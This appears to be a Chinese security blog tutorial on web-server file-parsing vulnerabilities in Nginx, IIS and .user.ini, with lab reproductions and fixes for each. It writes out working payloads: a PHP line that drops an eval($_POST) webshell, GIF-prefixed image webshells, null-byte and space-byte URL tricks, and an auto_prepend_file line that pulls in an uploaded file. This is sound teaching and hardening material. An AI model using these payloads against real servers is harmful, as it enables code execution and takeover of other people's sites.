alt=在这里插入图片描述><br>Nginx是一款高性能的WEB服务器，通常用来作为PHP的解析容器。</p><h3 id=0x03-Nginx><a href=#0x03-Nginx class=headerlink title="0x03 Nginx"></a>0x03 Nginx</h3><h4 id=1、Nginx-PHP-CGI-解析漏洞-fix-pathinfo><a href=#1、Nginx-PHP-CGI-解析漏洞-fix-pathinfo class=headerlink title="1、Nginx PHP CGI 解析漏洞(fix_pathinfo)"></a>1、Nginx PHP CGI 解析漏洞(fix_pathinfo)</h4><p><strong>漏洞描述</strong>：<br>查看nginx的配置文件<br><code>vim /etc/nginx/conf.d/default.conf</code><br><img src="https://img-blog.csdnimg.cn/20201004163114780.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>（1）Nginx默认是以CGI的方式支持PHP解析的，普遍的做法是在Nginx配置文件中通过正则匹配设置SCRIPT_FILENAME。当访问<code>http://x.x.x.x/phpinfo.jpg/1.php</code>这个URL时，<code>$fastcgi_script_name</code>会被设置为<code>phpinfo.jpg/1.php</code>，然后构造成SCRIPT_FILENAME传递给PHP CGI。<br>（2）但PHP为什么会接受这样的参数，并将phpinfo.jpg作为PHP文件解析呢?<br>这就涉及到<code>fix_pathinfo</code>选项了。如果PHP中开启了fix_pathinfo这个选项，PHP会认为SCRIPT_FILENAME是phpinfo.jpg，而1.php是PATH_INFO，所以就会将phpinfo.jpg作为PHP文件来解析了。</p><p>简单来说，由于Nginx的特性，只要URL中路径名以<code>.php</code>结尾，不管该文件是否存在，直接交给php处理。</p><blockquote><p>注：新版本php引入了security.limit_extensions，限制了可执行文件的后缀，默认只允许执行.php文件<br>使得该漏洞难以被成功利用</p></blockquote><p><em>相关知识</em>：<br>（1）通过phpinfo查看<code>cgi.fix_pathinfo=1</code>，PHP里经常要获取当前请求的URL路径信息。一般可以通过环境变量<code>$_SERVER[‘PATH_INFO’]</code>获取，而配置文件中的<code>cgi.fix_pathinifo</code>选项则与这个值的获取相关。<br><img src="https://img-blog.csdnimg.cn/20201004163958936.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>（2）在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的，当URL中有不存在的文件，PHP就会向前递归解析。<br><strong>影响版本</strong>：<br>漏洞与Nginx、php版本无关，属于用户配置不当造成的解析漏洞<br><strong>漏洞形式</strong>：</p><blockquote><p>/1.jpg/1.php<br>/1.jpg/.php<br>/1.jpg%00.php<br>/1.jpg/%20\0.php</p></blockquote><p>还有一种方法是：上传一个名字为qwzf.jpg，文件内容如下：</p><pre><code class=php>&lt;?php fputs(fopen(&#39;shell.php&#39;,&#39;w&#39;),&#39;&lt;?php @eval($_POST[&#39;qwzf&#39;]);?&gt;&#39;); ?&gt;</code></pre><p>然后访问<code>qwzf.jpg/.php</code>,在当前目录下就会生成一句话木马shell.php</p><p><strong>测试环境</strong>：<br>1.环境一：<br>vulhub靶场的漏洞环境<br>环境位置：<code>vulhub/nginx/nginx_parsing_vulnerability</code><br>nginx版本：<code>nginx/1.19.2</code><br>2.环境二：<br>使用phpstudy测试，默认配置即可(默认的cgi.fix_pathinfo是注释状态，但默认值确为1)<br>nginx版本：<code>nginx/1.11.5</code><br><strong>开始测试</strong>：<br>使用环境一的vulhub靶场对应的环境<br>上传一个jpg文件，文件名为<code>phpinfo.jpg</code>，文件内容为(或者上传图片马)：</p><pre><code class=php>GIF89a
&lt;?php phpinfo(); ?&gt;</code></pre><p><img src=https://img-blog.csdnimg.cn/20201004160003833.png alt=在这里插入图片描述><br>上传成功，访问一下</p><pre><code class=php>/uploadfiles/b5f7a062d84869fe4f3af35b79fca50c.jpg/1.php
/uploadfiles/b5f7a062d84869fe4f3af35b79fca50c.jpg/.php
/uploadfiles/b5f7a062d84869fe4f3af35b79fca50c.jpg/%20\0.php</code></pre><p>发现除了%00截断外，均以php的形式解析，显示phpinfo信息<br><img src="https://img-blog.csdnimg.cn/20201004161440680.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>%00截断不能成功，原因应该是PHP的版本问题。%00截断使用条件：php 版本&lt;5.3.4<br><strong>修复方法</strong>：<br>1.修改php.ini文件，将cgi.fix_pathinfo的值设置为0(慎用);<br>若实在将cgi.fix_pathinfo的值设置为0，就将php-fpm.conf中的<code>security.limit_extensions</code>后面的值设置为<code>.php</code><br>2.在Nginx配置文件中添加以下代码：</p><pre><code class=bash>if ( $fastcgi_script_name ~ ..*/.*php ) {
return 403;
}</code></pre><p>代码的意思：当匹配到类似test.jpg/a.php的URL时，将返回403错误代码。<br>3.使用Apache服务器的，在相应目录下放一个 .htaccess 文件，内容为：</p><pre><code class=bash>&lt;FilesMatch &quot;(?i:\.php)$&quot;&gt;
    Deny from all
&lt;/FilesMatch&gt;</code></pre><p>4.不提供上传的原文件访问，对文件输出经过程序处理。<br>5.图片单独放一个服务器上，与业务代码数据进行隔离。</p><h4 id=2、空字节代码执行漏洞><a href=#2、空字节代码执行漏洞 class=headerlink title=2、空字节代码执行漏洞></a>2、空字节代码执行漏洞</h4><p><strong>漏洞描述</strong>：<br>Ngnix在遇到%00空字节时与后端FastCGI处理不一致，导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码<br><strong>影响版本</strong>:<br>Nginx 0.5.x<br>Nginx 0.6.x<br>Nginx 0.7-0.7.65<br>Nginx 0.8-0.8.37<br><strong>测试环境</strong>：<br><a href=https://nginx.org/en/download.html target=_blank rel=noopener>nginx官网</a><br>由于环境比较旧，不太容易搭建，这里只阐述一下大致过程：<br>1.上传一个qwzf.jpg图片文件<br>2.访问<code>http://x.x.x.x/qwzf.jpg％00.php</code><br>3.就会将qwzf.jpg作为PHP文件进行解析<br><strong>修复方法</strong>：<br>1.升级nginx<br>2.禁止在上传文件目录下执行php文件<br>3.在nginx配置或者fcgi.conf配置添加下面内容：</p><pre><code class=bash>if ($request_filename ~* (.*)\.php) {
    set $php_url $1;
}
if (!-e $php_url.php) {
    return 403;
}</code></pre><h4 id=3、nginx文件名逻辑漏洞-CVE-2013-4547><a href=#3、nginx文件名逻辑漏洞-CVE-2013-4547 class=headerlink title=3、nginx文件名逻辑漏洞(CVE-2013-4547)></a>3、nginx文件名逻辑漏洞(CVE-2013-4547)</h4><p><strong>漏洞描述</strong>：<br>1.漏洞产生原因：<br>错误地解析了请求的URL,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。<br>2.漏洞原理：<br>Nginx匹配到<code>.php</code>结尾的请求，就发送给fastcgi进行解析，常见写法：</p><pre><code class=bash>location ~ \.php$ {
    include        fastcgi_params;

    fastcgi_pass   127.0.0.1:9000;
    fastcgi_index  index.php;
    fastcgi_param  SCRIPT_FILENAME  /var/www/html$fastcgi_script_name;
    fastcgi_param  DOCUMENT_ROOT /var/www/html;
}</code></pre><p>（1）在关闭fix_pathinfo的情况下(即<code>cgi.fix_pathinfo=0</code>)，只有.php后缀的文件才会被发送给fastcgi解析<br>（2）存在CVE-2013-4547时，请求<code>qwzf.jpg[0x20][0x00].php</code>，这个URI可匹配到正则<code>\.php$</code>，进入到Location块；<br>（3）进入后，Nginx错误地认为请求的文件是<code>qwzf.jpg[0x20]</code>，然后设置其为SCRIPT_FILENAME的值发送给fastcgi。<br>（4）fastcgi根据SCRIPT_FILENAME的值，将<code>qwzf.jpg[0x20]</code>以php文件的形式进行解析，从而造成了解析漏洞。<br>也就是说，我们只需要上传一个空格结尾的文件，即可用PHP进行解析。<br><strong>影响版本</strong>:<br>Nginx 0.8.41-1.4.3<br>Nginx 1.5 -1.5.7<br><strong>测试环境</strong>：<br>vulhub靶场的漏洞环境<br>环境位置：<code>vulhub/nginx/CVE-2013-4547</code><br>nginx版本：<code>nginx/1.4.2</code><br><strong>开始测试</strong>：<br>上传一个jpg文件，文件名为<code>qwzf.jpg</code>，文件内容为(或者上传图片马)：</p><pre><code class=php>GIF89a
&lt;?php phpinfo(); ?&gt;</code></pre><p>使用burp添加空格<br><img src=https://img-blog.csdnimg.cn/20201004210938130.png alt=在这里插入图片描述><br>发包，成功上传文件<br><img src=https://img-blog.csdnimg.cn/20201004205855726.png alt=在这里插入图片描述><br>访问<code>/uploadfiles/qwzf.jpg/.php</code>，burp抓包，添加两个空格<br><img src=https://img-blog.csdnimg.cn/20201004211306639.png alt=在这里插入图片描述><br>使用burp的hex功能，将第二个空格的0x20改为0x00<br><img src=https://img-blog.csdnimg.cn/2020100421141686.png alt=在这里插入图片描述><br>发包，成功解析。<br><img src="https://img-blog.csdnimg.cn/20201004211500466.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述></p><h3 id=0x04-IIS><a href=#0x04-IIS class=headerlink title="0x04 IIS"></a>0x04 IIS</h3><p>IIS(Internet Information Services)是微软出品的灵活、安全、易于管理的Web服务器。</p><h4 id=1、IIS-5-x和IIS-6-x解析漏洞><a href=#1、IIS-5-x和IIS-6-x解析漏洞 class=headerlink title="1、IIS 5.x和IIS 6.x解析漏洞"></a>1、IIS 5.x和IIS 6.x解析漏洞</h4><p>使用iis5.x-6.x版本的服务器，大多为windows server 2003，网站比较古老，开发语言一般为asp；该解析漏洞也只能解析asp文件，而不能解析aspx文件。<br><strong>测试环境</strong>：<br>因为找不到相关环境，并且不想搭建，所以这里只阐述相关原理和相关知识。</p><h5 id=1-目录解析-6-0><a href=#1-目录解析-6-0 class=headerlink title=1.目录解析(6.0)></a>1.目录解析(6.0)</h5><p><strong>形式</strong>：<code>http://www.xxx.com/xx.asp/xx.jpg</code><br><strong>原理</strong>: 服务器默认会把<code>.asp</code>，<code>.asa</code>目录下的文件都解析成asp文件。</p><h5 id=2-文件解析-6-0><a href=#2-文件解析-6-0 class=headerlink title=2.文件解析(6.0)></a>2.文件解析(6.0)</h5><p><strong>形式</strong>：<code>http://www.xxx.com/xx.asp;.jpg</code><br><strong>原理</strong>：服务器默认不解析<code>;</code>号后面的内容，因此<code>xx.asp;.jpg</code>便被解析成asp文件。</p><h5 id=3-解析文件类型-默认解析后缀><a href=#3-解析文件类型-默认解析后缀 class=headerlink title=3.解析文件类型(默认解析后缀)></a>3.解析文件类型(默认解析后缀)</h5><p>有的网站会设置黑名单上传限制 ,IIS6.0 默认的可执行文件除了asp还包含这三种 :</p><pre><code class=bash>/xx.asa
/xx.cer
/xx.cdx</code></pre><p>iis把asa，cdx，cer解析成asp文件的原因：这四种扩展名都是用的同一个asp.dll文件来执行。<br><strong>修复方法</strong>：<br>1.阻止创建<code>.asp</code>和<code>.asa</code>类型的文件夹<br>2.阻止上传<code>xx.asp;.jpg</code>类型的文件名<br>3.阻止上传<code>.asa</code>、<code>.cer</code>和<code>.cdx</code>后缀的文件<br>4.设置权限，限制用户创建文件夹</p><h4 id=2、IIS-7-0-7-5-CGI解析漏洞><a href=#2、IIS-7-0-7-5-CGI解析漏洞 class=headerlink title="2、IIS 7.0/7.5 CGI解析漏洞"></a>2、IIS 7.0/7.5 CGI解析漏洞</h4><p><strong>漏洞描述</strong>：<br>IIS7/7.5的漏洞与nginx的类似，都是由于php配置文件中，开启了<code>cgi.fix_pathinfo</code>，而这并不是nginx或者iis7/7.5本身的漏洞。<br><strong>漏洞产生的条件</strong>：<br>php.ini里的<code>cgi.cgi_pathinfo=1</code><br>IIS7在Fast-CGI运行模式下<br><strong>测试环境</strong>：<br>windows server 2008 R2（x64）<br>IIS7<br>phpStudy 2018版本<br><strong>开始测试</strong>：<br>首先在VMware安装windows server 2008 R2虚拟机(比较简单，百度搜教程即可)，然后安装IIS7和phpStudy 2018。可参考：<a href=https://blog.csdn.net/nzjdsds/article/details/96989492 target=_blank rel=noopener>IIS7.0解析漏洞</a><br>写一个index.php文件测试环境是否能正常工作。<br><img src=https://img-blog.csdnimg.cn/20201006200738763.png alt=在这里插入图片描述><br>正常工作。接下来，正式开始测试<br>1.在站点根目录创建一个qwzf.jpg文件，文件内容为：</p><pre><code class=php>&lt;?php phpinfo(); ?&gt;</code></pre><p>2.配置CGI 模式<br>（1）在php.ini文件里将cgi.fix_pathinfo 取消注释并把值改为1<br><img src=https://img-blog.csdnimg.cn/20201006201314867.png alt=在这里插入图片描述><br>（2）更改网站的处理程序映射<br>管理工具 –&gt; IIS -&gt; WIN-5RQ4P819403 -&gt; 处理程序映射<br><img src=https://img-blog.csdnimg.cn/20201006201921135.png alt=在这里插入图片描述><br>3.访问<code>http://192.168.201.149/qwzf.jpg/.php</code><br><img src=https://img-blog.csdnimg.cn/20201006202443478.png alt=在这里插入图片描述><br>发现<code>qwzf.jpg</code>成功解析。<br><strong>常用利用方法</strong>：上传图片马</p><h3 id=0x05-user-ini><a href=#0x05-user-ini class=headerlink title="0x05 .user.ini"></a>0x05 .user.ini</h3><p><strong>.user.ini 作用和配置</strong><br><code>.htaccess</code>是伪静态环境配置文件，用于lamp。<br><code>.user.ini</code>是lnmp文件，里面放的是你网站的文件夹路径地址。目的是防止跨目录访问和文件跨目录读取.</p><p>为了防止跨站，可将 <code>.user.ini</code>放在网站根目录下，内容为：<br><code>open_basedir=/项目路径/:/tmp/:/proc/</code><br>如：<code>open_basedir=/var/www/html/:/tmp/:/proc/</code><br><strong>测试代码</strong>：</p><pre><code class=php>&lt;?php 
//获取当前文件所在的绝对目录
$dir = dirname(__FILE__);
echo &quot; &lt;pre&gt;&quot;;
print_r($dir);
//读取根目录文件夹vim
$file = scandir(&#39;/&#39;);
//显示
echo &quot; &lt;pre&gt;&quot;;
print_r($file);
?&gt;</code></pre><p>没加<code>.user.ini</code>的时候可以直接读到根目录的文件<br><img src=https://img-blog.csdnimg.cn/20201004233031380.png alt=在这里插入图片描述><br>加上<code>.user.ini</code>之后，就读不到根目录的文件了<br><img src=https://img-blog.csdnimg.cn/20201004235609862.png alt=在这里插入图片描述><br><strong>.user.ini文件利用</strong></p><blockquote><p>利用条件：<br>1.服务器脚本语言为PHP<br>2.服务器使用CGI／FastCGI模式<br>3.上传目录下要有可执行的php文件</p></blockquote><p>参考：<a href=https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html target=_blank rel=noopener>user.ini文件构成的PHP后门</a><br>大师傅博客里对<code>.user.ini</code>的解释具体可以怎样理解呢？<br>我的对其总结如下：</p><blockquote><p>1.<code>php.ini</code>作为php的默认的配置文件，包括很多php配置，可分为：<code>PHP_INI_SYSTEM</code>、<code>PHP_INI_PERDIR</code>、<code>PHP_INI_ALL</code>、<code>PHP_INI_USER</code>。</p></blockquote><blockquote><p>2.模式为<code>PHP_INI_USER</code>的配置项，可在<code>ini_set()</code>函数中设置、<code>注册表</code>中设置和<code>.user.ini</code>中设置</p></blockquote><blockquote><p>3.PHP会在每个目录下扫描 INI 文件，从被执行PHP 文件所在目录一直上升到 web 根目录(<code>$_SERVER[&#39;DOCUMENT_ROOT&#39;]</code>所指定的)。若被执行PHP 文件在 web 根目录之外，则只扫描该目录。</p></blockquote><blockquote><p>4.<code>.user.ini</code>简单来说，就是一个可以由用户“自定义”的<code>php.ini</code>，可以自定义的设置是模式为<code>PHP_INI_PERDIR</code> 、 <code>PHP_INI_USER</code>的设置(实际上，除<code>PHP_INI_SYSTEM</code>外的模式都可以通过<code>.user.ini</code>来设置)。</p></blockquote><blockquote><p>5.<code>.user.ini</code>是一个能被动态加载的ini文件。也就是修改<code>.user.ini</code>后，不需要重启服务器中间件，只需要等待<code>user_ini.cache_ttl</code>所设置的时间(默认为300秒)，即可被重新加载。</p></blockquote><blockquote><p>6.php配置项<code>auto_prepend_file</code>(<code>auto_append_file</code>)，指定一个文件，自动包含在要执行的文件前(后)，类似于在文件前(后)调用了require()函数。即借助<code>.user.ini</code>文件，可让所有php文件都“自动”包含某个文件<br>(当文件调用的有exit()时该设置无效）</p></blockquote><p>可直接在<code>.user.ini</code>中设置要包含的文件(如webshell、图片马等)：</p><pre><code class=bash>auto_prepend_file=qwzf.jpg</code></pre><p><code>qwzf.jpg</code>即是可执行php文件要包含的文件。<br><strong>开始测试</strong>：<br>直接使用vulhub靶场<code>vulhub/nginx/CVE-2013-4547</code>环境，在uploadfiles目录下创建一个可执行的php文件index.php<br>（1）上传<code>.user.ini</code>文件，内容如下：</p><pre><code class=bash>GIF89a
auto_prepend_file=qwzf.jpg</code></pre><p>（2）上传图片马<code>qwzf.jpg</code>，内容如下：</p><pre><code class=bash>GIF89a
&lt;?php phpinfo(); ?&gt;</code></pre><p>访问<code>/uploadfiles/index.php</code>，发现qwzf.jpg被成功包含到index.php之前进行解析<br><img src="https://img-blog.csdnimg.cn/20201005004430769.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述></p><h3 id=0x06-Windows操作系统文件命名规则><a href=#0x06-Windows操作系统文件命名规则 class=headerlink title="0x06 Windows操作系统文件命名规则"></a>0x06 Windows操作系统文件命名规则</h3><p>Windows操作系统中，文件名不能以空格或<code>.</code>开头，也不能以空格或<code>.</code>结尾。当把一个文件命名为以空格或<code>.</code>开头或结尾时，会自动地去掉开头和结尾处的空格和<code>.</code>。利用此特性，也可能造成<strong>文件解析漏洞</strong>。</p><p>参考博客：<br><a href="https://www.smi1e.top/%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/" target=_blank rel=noopener>文件解析漏洞总结</a><br><a href=https://www.cnblogs.com/kagari/p/12638765.html target=_blank rel=noopener>CTF考点总结-文件上传/文件包含</a><br><a href=https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html target=_blank rel=noopener>利用最新Apache解析漏洞（CVE-2017-15715）绕过上传黑名单</a><br><a href=https://www.cnblogs.com/imbrave99/p/13369549.html target=_blank rel=noopener>文件上传漏洞，解析漏洞总结</a><br><a href=https://blog.csdn.net/u011781521/article/details/58630742 target=_blank rel=noopener>解析漏洞整理</a><br><a href=https://www.cnblogs.com/shellr00t/p/6426856.html target=_blank rel=noopener>典型漏洞归纳之解析漏洞</a><br><a href=https://www.cnblogs.com/zlgxzswjy/p/6561229.html target=_blank rel=noopener>服务器解析漏洞总结</a><br><a href="https://blog.csdn.net/wn314/article/details/77388289/" target=_blank rel=noopener>文件解析漏洞总结-Nginx</a><br><a href="https://zgao.top/nginx%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE%E5%BC%95%E5%8F%91%E7%9A%84%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" target=_blank rel=noopener>Nginx错误配置引发的解析漏洞复现</a><br><a href=https://www.cnblogs.com/yuzly/p/11221564.html target=_blank rel=noopener>nginx文件名逻辑漏洞_CVE-2013-4547漏洞复现</a><br><a href="https://blog.csdn.net/u013372487/article/details/51909766?utm_source=blogxgwz1" target=_blank rel=noopener>nginx+php使用open_basedir限制站点目录防止跨站</a></p><hr><span style="font-style: italic;color: gray;">转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 qwzf1024@qq.com</span></div></article><p><a class=dashang onclick=dashangToggle()>赏</a></p><div id=vcomment class=comment></div><script src=//cdn1.lncld.net/static/js/3.0.4/av-min.js></script><script src=//unpkg.com/valine/dist/Valine.min.js></script><script src=https://cdnjs.loli.net/ajax/libs/jquery/3.2.1/jquery.min.js></script><script>
    var notify = 'true' == true ? true : false;
    var verify = 'true' == true ? true : false;
    new Valine({
        av: AV,
        el: '#vcomment',
        notify: notify,
        app_id: "5cXOwuHg0Yrf8teE1lzRCjHi-gzGzoHsz",
        app_key: "ToPzd33a36q3VXf83omuntVV",
        placeholder: "快来评论呀！",
        avatar:"mp",
        recordIP: "true",
        enableQQ: "true"
    });
</script></div><div class=copyright><p class=footer-entry><span class=miit><img src=/img/gov.png title=中华人民共和国工业和信息化部> <a href="http://beian.miit.gov.cn/">豫ICP备20008873号</a></span> ©2019-2020 Qwzf</p><p class=footer-entry>Built with <a href="https://hexo.io/" target=_blank>Hexo</a> and <a href=https://github.com/yelog/hexo-theme-3-hexo target=_blank>3-hexo</a> theme</p></div><div class=full-toc><button class=full data-title="切换全屏 快捷键 s"><span class=min></span></button> <a id=rocket></a></div></div><div class=hide_box onclick=dashangToggle()></div><div class=shang_box><a class=shang_close onclick=dashangToggle()>×</a><div class=shang_tit><p>喜欢就点赞,疼爱就打赏</p></div><div class=shang_payimg><div class=pay_img><img src=/img/alipay.jpg class=alipay title=扫码支持> <img src=/img/weixin.jpg class=weixin title=扫码支持></div></div><div class=shang_payselect><span><label><input type=radio name=pay checked value=alipay>支付宝</label></span><span><label><input type=radio name=pay value=weixin>微信</label></span></div></div><script src=/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/haruto.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false});</script></body><script src="/js/jquery.pjax.js?v=1.1.0"></script><script>
  function unmouse(){ 
  document.oncontextmenu = new Function("return false;");
  document.onkeydown = document.onkeyup = document.onkeypress = function(event) {
      var e = event || window.event || arguments.callee.caller.arguments[0];
      if (e && (e.keyCode == 123 || (e.keyCode == 116 && e.type!='keypress'))) 
      {
          e.returnValue = false;
          return (false);
      }
  }
  }
  unmouse()
</script><script src="/js/script.js?v=1.1.0"></script><script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script><style>
    
    
    .nav {
        width: 572px;
    }
    .nav.fullscreen {
        margin-left: -572px;
    }
    .nav-left {
        width: 150px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    
    #post .pjax article .article-entry>ol, #post .pjax article .article-entry>ul, #post .pjax article>ol, #post .pjax article>ul{
        border: #e2dede solid 1px;
        border-radius: 10px;
        padding: 10px 32px 10px 56px;
    }
    #post .pjax article .article-entry li>ol, #post .pjax article .article-entry li>ul,#post .pjax article li>ol, #post .pjax article li>ul{
        padding-top: 5px;
        padding-bottom: 5px;
    }
    #post .pjax article .article-entry>ol>li, #post .pjax article .article-entry>ul>li,#post .pjax article>ol>li, #post .pjax article>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    #post .pjax article .article-entry li>ol>li, #post .pjax article .article-entry li>ul>li,#post .pjax article li>ol>li, #post .pjax article li>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.3;
        background: url("https://img-blog.csdnimg.cn/20200726174858546.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style></html>